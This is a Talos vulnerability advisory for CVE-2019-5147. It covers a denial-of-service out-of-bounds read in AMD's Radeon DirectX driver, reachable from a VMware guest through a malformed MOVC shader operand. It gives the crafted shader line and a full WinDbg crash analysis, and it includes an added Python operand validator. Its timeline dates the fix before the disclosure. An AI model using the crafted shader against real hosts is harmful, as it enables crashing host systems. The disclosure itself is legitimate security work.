Talos Vulnerability Report

TALOS-2019-0936

AMD ATI Radeon ATIDXX64.DLL MOVC shader functionality denial-of-service vulnerability

January 21, 2020
CVE Number

CVE-2019-5147

Summary

An exploitable out-of-bounds read vulnerability exists in the AMD ATIDXX64.DLL driver, version 26.20.13003.1007. A specially crafted pixel shader can cause a denial of service. An attacker can provide a specially crafted shader file to trigger this vulnerability. This vulnerability can be triggered from a VMware guest, affecting the VMware host.

Tested Versions

AMD ATIDXX64.DLL (26.20.13003.1007) running on Radeon RX 550 / 550 Series, VMware Workstation 15 (15.5.0 build-14665864) with Windows 10 x64 as the guest VM

Product URLs

http://amd.com
http://vmware.com

CVSSv3 Score

8.6 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

CWE

CWE-125: Out-of-bounds Read

Details

This vulnerability can be triggered by supplying a malformed pixel shader (inside the VMware guest OS). Such an attack can be launched from VMware guest user mode to cause an out-of-bounds read in the vmware-vmx.exe process on the host, or theoretically through WebGL (a remote website).

Example shader:

ps_4_1
00000000: dcl_global_flags refactoringAllowed
00000001: dcl_constant_buffer cb0[3].xyzw, immediateIndexed
00000002: dcl_sampler sampler[0]
00000003: dcl_sampler sampler[1]
00000004: dcl_sampler sampler[2]
...
00000020: movc r1.x, sampler[1], r1.z, r1.x

By modifying the MOVC instruction (component-wise conditional move) operand from "movc r1.x, r1.y, r1.z, r1.x" to "movc r1.x, sampler[1], r1.z, r1.x", it is possible to cause an out-of-bounds read access violation.

As you can see below, after the shader operand modification, the RCX register used as the index in the "MOV RDX,QWORD PTR [RAX+RCX*8]" instruction is set to 0xffffffff.

(6b4.1720): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
atidxx64!AmdDxGsaFreeCompiledShader+0x3aeabc:
00007ff8`e3088d8c 488b14c8        mov     rdx,qword ptr [rax+rcx*8] ds:00000152`ce649a10=????????????????
0:000> r
rax=0000014ace649a18 rbx=00007ff8e2c70000 rcx=00000000ffffffff
rdx=0000014ace6499f8 rsi=0000000000000010 rdi=0000014ace647fd8
rip=00007ff8e3088d8c rsp=00000036545796e0 rbp=0000000000000010
 r8=0000000000000004  r9=00007ff8e35d1594 r10=0000000000000001
r11=0000014ace8e3398 r12=0000014ace647f00 r13=0000000000000000
r14=0000000000000000 r15=0000014ace6490e0
iopl=0         nv up ei ng nz ac po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010296
atidxx64!AmdDxGsaFreeCompiledShader+0x3aeabc:
00007ff8`e3088d8c 488b14c8        mov     rdx,qword ptr [rax+rcx*8] ds:00000152`ce649a10=????????????????
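As an added example (not from the report and not AMD's driver code), the following Python models the operand-class validation that would reject this shader before any register-file lookup takes place. The shader fragment is constructed in the report's disassembly format, and the fall-through to -1 in `temp_register_index` is an assumed model of how a sampler operand could yield the 0xffffffff index seen in RCX, not the driver's actual logic.

```python
import re

# Constructed sample in the report's disassembly format: original MOVC and the malformed one.
GOOD_SHADER = """\
ps_4_1
00000000: dcl_constant_buffer cb0[3].xyzw, immediateIndexed
00000001: dcl_sampler sampler[1]
00000002: movc r1.x, r1.y, r1.z, r1.x
"""
BAD_SHADER = GOOD_SHADER.replace("movc r1.x, r1.y, r1.z, r1.x",
                                 "movc r1.x, sampler[1], r1.z, r1.x")

# Operand syntax: temp r#, constant buffer cb#[#], sampler[#], texture t#, optional swizzle.
OPERAND_RE = re.compile(
    r"^(?P<cls>r|cb|sampler|t)(?P<idx>\d+)?(?:\[\d+\])?(?:\.[xyzw]{1,4})?$")

# Hypothetical policy: MOVC consumes numeric values, so a sampler object is never a legal source.
ALLOWED_SRC = {"movc": {"r", "cb", "literal"}}

def classify(op):
    # Returns the operand class: 'r', 'cb', 'sampler', 't' or 'literal'.
    if op.startswith("l(") or re.fullmatch(r"-?\d+(\.\d+)?", op):
        return "literal"
    m = OPERAND_RE.match(op)
    if not m:
        raise ValueError(f"unparseable operand {op!r}")
    return m.group("cls")

def temp_register_index(op):
    """Model of an unchecked lookup (assumption, not the driver's code): non-register
    operands fall through to -1, which as a 32-bit index is the 0xffffffff seen in RCX."""
    m = OPERAND_RE.match(op)
    if m and m.group("cls") == "r":
        return int(m.group("idx"))
    return -1 & 0xFFFFFFFF

def validate(shader):
    """Return (line_no, message) for every source operand of a disallowed class."""
    problems = []
    for n, raw in enumerate(shader.splitlines(), 1):
        line = re.sub(r"^[0-9a-f]{8}:\s*", "", raw.strip())  # drop the address prefix
        opcode, _, rest = line.partition(" ")
        if opcode not in ALLOWED_SRC:  # version token, declarations, unlisted opcodes
            continue
        operands = [o.strip() for o in rest.split(",")]
        for pos, op in enumerate(operands[1:], 1):  # operand 0 is the destination
            cls = classify(op)
            if cls not in ALLOWED_SRC[opcode]:
                problems.append((n, f"{opcode}: source operand {pos} is a {cls}, not a "
                                    f"value; unchecked slot {temp_register_index(op):#x}"))
    return problems
```

Running `validate(BAD_SHADER)` reports the MOVC line with a sampler source and the 0xffffffff slot an unchecked lookup would use, while the original shader validates cleanly.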

Crash Information

0:000> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

*** WARNING: Unable to verify checksum for VENDOR_ONLY.exe

KEY_VALUES_STRING: 1

    Key  : AV.Fault
    Value: Read

    Key  : Timeline.OS.Boot.DeltaSec
    Value: 233600

    Key  : Timeline.Process.Start.DeltaSec
    Value: 68


PROCESSES_ANALYSIS: 1

SERVICE_ANALYSIS: 1

STACKHASH_ANALYSIS: 1

TIMELINE_ANALYSIS: 1

Timeline: !analyze.Start
    Name: <blank>
    Time: 2019-10-11T12:02:20.144Z
    Diff: 7855 mSec

Timeline: Dump.Current
    Name: <blank>
    Time: 2019-10-11T12:02:28.0Z
    Diff: 0 mSec

Timeline: Process.Start
    Name: <blank>
    Time: 2019-10-11T12:01:20.0Z
    Diff: 68000 mSec

Timeline: OS.Boot
    Name: <blank>
    Time: 2019-10-08T19:09:08.0Z
    Diff: 233600000 mSec


DUMP_CLASS: 2

DUMP_QUALIFIER: 0

FAULTING_IP: 
atidxx64!AmdDxGsaFreeCompiledShader+3aeabc
00007ff8`e3088d8c 488b14c8        mov     rdx,qword ptr [rax+rcx*8]

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 00007ff8e3088d8c (atidxx64!AmdDxGsaFreeCompiledShader+0x00000000003aeabc)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 0000000000000000
   Parameter[1]: 00000152ce649a10
Attempt to read from address 00000152ce649a10

FAULTING_THREAD:  00001720

DEFAULT_BUCKET_ID:  INVALID_POINTER_READ

PROCESS_NAME:  VENDOR_ONLY.exe

FOLLOWUP_IP: 
atidxx64!AmdDxGsaFreeCompiledShader+3aeabc
00007ff8`e3088d8c 488b14c8        mov     rdx,qword ptr [rax+rcx*8]

READ_ADDRESS:  00000152ce649a10 

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE_STR:  c0000005

EXCEPTION_PARAMETER1:  0000000000000000

EXCEPTION_PARAMETER2:  00000152ce649a10

WATSON_BKT_PROCSTAMP:  5cb740ee

WATSON_BKT_MODULE:  atidxx64.dll

WATSON_BKT_MODSTAMP:  5d781adb

WATSON_BKT_MODOFFSET:  418d8c

WATSON_BKT_MODVER:  26.20.13003.1007

MODULE_VER_PRODUCT:  Advanced Micro Devices, Inc. Radeon DirectX 11 Driver

BUILD_VERSION_STRING:  18362.1.amd64fre.19h1_release.190318-1202

MODLIST_WITH_TSCHKSUM_HASH:  2467318f4e32d63f6c5405aabc2a43724e772411

MODLIST_SHA1_HASH:  8d415343d816bb4896ee4592431a2c0c44961ee3

NTGLOBALFLAG:  470

PROCESS_BAM_CURRENT_THROTTLED: 0

PROCESS_BAM_PREVIOUS_THROTTLED: 0

APPLICATION_VERIFIER_FLAGS:  0

PRODUCT_TYPE:  1

SUITE_MASK:  272

DUMP_TYPE:  fe

ANALYSIS_SESSION_HOST:  CLAB

ANALYSIS_SESSION_TIME:  10-11-2019 14:02:20.0144

ANALYSIS_VERSION: 10.0.18362.1 amd64fre

THREAD_ATTRIBUTES: 
OS_LOCALE:  ENU

BUGCHECK_STR:  APPLICATION_FAULT_INVALID_POINTER_READ

PRIMARY_PROBLEM_CLASS:  APPLICATION_FAULT

PROBLEM_CLASSES: 

    ID:     [0n313]
    Type:   [@ACCESS_VIOLATION]
    Class:  Addendum
    Scope:  BUCKET_ID
    Name:   Omit
    Data:   Omit
    PID:    [Unspecified]
    TID:    [0x1720]
    Frame:  [0] : atidxx64!AmdDxGsaFreeCompiledShader

    ID:     [0n285]
    Type:   [INVALID_POINTER_READ]
    Class:  Primary
    Scope:  DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
            BUCKET_ID
    Name:   Add
    Data:   Omit
    PID:    [Unspecified]
    TID:    [0x1720]
    Frame:  [0] : atidxx64!AmdDxGsaFreeCompiledShader

LAST_CONTROL_TRANSFER:  from 00007ff8e304d1f4 to 00007ff8e3088d8c

STACK_TEXT:  
00000036`545796e0 00007ff8`e304d1f4 : 00000000`00000000 00000000`00000000 00000036`00000000 00007ff8`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x3aeabc
00000036`545797c0 00007ff8`e2de6416 : 0000014a`ce647fd8 0000014a`ce837000 0000014a`ce65be00 0000014a`ce837001 : atidxx64!AmdDxGsaFreeCompiledShader+0x372f24
00000036`54579a30 00007ff8`e2dd66d0 : 0000014a`ce621b10 0000014a`ce640098 00000000`00000004 0000014a`ce621b10 : atidxx64!AmdDxGsaFreeCompiledShader+0x10c146
00000036`54579bf0 00007ff8`e2db5924 : 0000014a`ce621b10 0000014a`ce838640 00000036`5457a430 0000014a`ce621b10 : atidxx64!AmdDxGsaFreeCompiledShader+0xfc400
00000036`54579c70 00007ff8`e2cf9364 : 00000000`00000001 00000036`5457a430 0000014a`ce838640 00000036`5457a430 : atidxx64!AmdDxGsaFreeCompiledShader+0xdb654
00000036`5457a1f0 00007ff8`e347fa28 : 0000014a`c82f8188 00000036`5457a320 00000036`5457a430 0000014a`c9d4eac0 : atidxx64!AmdDxGsaFreeCompiledShader+0x1f094
00000036`5457a220 00007ff8`e346515b : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x7a5758
00000036`5457a390 00007ff8`e3464c92 : 00000000`00000000 0000014a`ce838340 0000014a`ce592890 00000036`5457e0a0 : atidxx64!AmdDxGsaFreeCompiledShader+0x78ae8b
00000036`5457a3f0 00007ff8`e34956b3 : 0000014a`ce838340 00000000`00000000 0000014a`ce5f8730 00000036`5457e0a0 : atidxx64!AmdDxGsaFreeCompiledShader+0x78a9c2
00000036`5457e050 00007ff8`e3464b67 : 00000000`00000004 0000014a`ce8362c0 0000014a`ce5e5a90 0000014a`ce5a06c0 : atidxx64!AmdDxGsaFreeCompiledShader+0x7bb3e3
00000036`5457e080 00007ff8`e3534701 : 00000000`00000000 00000036`5457e3f0 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x78a897
00000036`5457e0e0 00007ff8`e2cf4cca : 00000000`00000000 00000000`00000000 00000036`5457e3f0 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x85a431
00000036`5457e120 00007ff8`e2cf4b13 : 0000014a`ce5bacd0 00000000`00000003 00000000`00000003 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x1a9fa
00000036`5457e160 00007ff8`e2c7c05e : 00000000`00000001 00000000`00000000 00000000`000007a8 00000000`00000003 : atidxx64!AmdDxGsaFreeCompiledShader+0x1a843
00000036`5457e1f0 00007ff8`e33e8146 : 00000000`00000000 00000036`5457e3f0 00000000`00000000 ffffffff`ffffffff : atidxx64!XdxQueryTlsLookupTable+0x6d6e
00000036`5457e230 00007ff8`e344bd09 : 00000000`00000000 0000014a`c8289d34 00000036`5457e3f0 00000000`00001400 : atidxx64!AmdDxGsaFreeCompiledShader+0x70de76
00000036`5457e3a0 00007ff8`e2c8d8b1 : 0000014a`ca159988 0000014a`c831b510 ffffffff`fffffffe 00007ff8`fee15113 : atidxx64!AmdDxGsaFreeCompiledShader+0x771a39
00000036`5457e3d0 00007ff8`fee18edc : 00000000`00000000 00000036`5457e600 0000014a`ca159978 00007ff9`04bfbabb : atidxx64!XdxQueryTlsLookupTable+0x185c1
00000036`5457e500 00007ff8`fee2295f : 00000036`00000001 0000014a`c8317928 0000014a`ca159978 0000014a`c830da10 : d3d11!CPixelShader::CLS::FinalConstruct+0x23c
00000036`5457e760 00007ff8`fee2289a : 00000036`5457ee40 00007ff8`fefd2388 0000014a`ca159840 00000000`000007a8 : d3d11!CLayeredObjectWithCLS<CPixelShader>::FinalConstruct+0xa3
00000036`5457e7f0 00007ff8`fee0ee58 : 0000014a`ca159868 00000036`5457ee40 00000036`5457ee70 00007ff8`fefd2388 : d3d11!CLayeredObjectWithCLS<CPixelShader>::CreateInstance+0x152
00000036`5457e850 00007ff8`fee1b17d : ffffffff`fffffffe 0000014a`ca159840 00000000`00000014 00000000`00000001 : d3d11!CDevice::CreateLayeredChild+0xc88
00000036`5457ec90 00007ff8`fee1b950 : 0000014a`ca159840 00000000`00000009 00000000`00000188 00000000`00000030 : d3d11!NDXGI::CDevice::CreateLayeredChild+0x6d
00000036`5457ee00 00007ff8`fee014f4 : 0000014a`c82eff20 00000000`00000009 0000014a`c8289ab0 0000014a`c82f0758 : d3d11!NOutermost::CDevice::CreateLayeredChild+0x1b0
00000036`5457eff0 00007ff8`fee01463 : 0000014a`c8289ab0 00480063`0000c000 00000036`5457f350 00450056`005f0031 : d3d11!CDevice::CreateAndRecreateLayeredChild<SD3D11LayeredPixelShaderCreationArgs>+0x64
00000036`5457f050 00007ff8`fee011e8 : 0000014a`c82f0758 0000014a`c8289ab0 00000000`00000874 00000000`00000000 : d3d11!CDevice::CreatePixelShader_Worker+0x203
00000036`5457f200 00007ff7`6b3d2f16 : 0000014a`c830daf0 00000036`5457f2c8 0000014a`c82f0768 00000000`00000000 : d3d11!CDevice::CreatePixelShader+0x28
...

STACK_COMMAND:  ~0s ; .cxr ; kb

THREAD_SHA1_HASH_MOD_FUNC:  b83b420a1889acfa7499f03138efd1bbb8d42aaa

THREAD_SHA1_HASH_MOD_FUNC_OFFSET:  207ff31388f1e8a88dd8a5d3adca8cc37b630abf

THREAD_SHA1_HASH_MOD:  9140cc03c00bea0093c654d38b4e903d793400cd

FAULT_INSTR_CODE:  c8148b48

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  atidxx64!AmdDxGsaFreeCompiledShader+3aeabc

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: atidxx64

IMAGE_NAME:  atidxx64.dll

DEBUG_FLR_IMAGE_TIMESTAMP:  5d781adb

FAILURE_BUCKET_ID:  INVALID_POINTER_READ_c0000005_atidxx64.dll!AmdDxGsaFreeCompiledShader

BUCKET_ID:  APPLICATION_FAULT_INVALID_POINTER_READ_atidxx64!AmdDxGsaFreeCompiledShader+3aeabc

FAILURE_EXCEPTION_CODE:  c0000005

FAILURE_IMAGE_NAME:  atidxx64.dll

BUCKET_ID_IMAGE_STR:  atidxx64.dll

FAILURE_MODULE_NAME:  atidxx64

BUCKET_ID_MODULE_STR:  atidxx64

FAILURE_FUNCTION_NAME:  AmdDxGsaFreeCompiledShader

BUCKET_ID_FUNCTION_STR:  AmdDxGsaFreeCompiledShader

BUCKET_ID_OFFSET:  3aeabc

BUCKET_ID_MODTIMEDATESTAMP:  5d781adb

BUCKET_ID_MODCHECKSUM:  1ae4e65

BUCKET_ID_MODVER_STR:  0.0.0.0

BUCKET_ID_PREFIX_STR:  APPLICATION_FAULT_INVALID_POINTER_READ_

FAILURE_PROBLEM_CLASS:  APPLICATION_FAULT

FAILURE_SYMBOL_NAME:  atidxx64.dll!AmdDxGsaFreeCompiledShader

TARGET_TIME:  2019-10-11T12:02:43.000Z

OSBUILD:  18362

OSSERVICEPACK:  329

SERVICEPACK_NUMBER: 0

OS_REVISION: 0

OSPLATFORM_TYPE:  x64

OSNAME:  Windows 10

OSEDITION:  Windows 10 WinNt SingleUserTS

USER_LCID:  0

OSBUILD_TIMESTAMP:  unknown_date

BUILDDATESTAMP_STR:  190318-1202

BUILDLAB_STR:  19h1_release

BUILDOSVER_STR:  10.0.18362.1.amd64fre.19h1_release.190318-1202

ANALYSIS_SESSION_ELAPSED_TIME:  5b08

ANALYSIS_SOURCE:  UM

FAILURE_ID_HASH_STRING:  um:invalid_pointer_read_c0000005_atidxx64.dll!amddxgsafreecompiledshader

FAILURE_ID_HASH:  {08b458dc-1323-2abb-9f1a-d0ac543a793c}

Followup:     MachineOwner
---------

Timeline

2019-10-23 - Vendor Disclosure
2019-01-13 - Vendor confirmed fix and no issues found on versions 15.5.1 with 20.1.1 AMD drivers
2020-01-21 - Public Release

Credit

Discovered by Piotr Bania of Cisco Talos.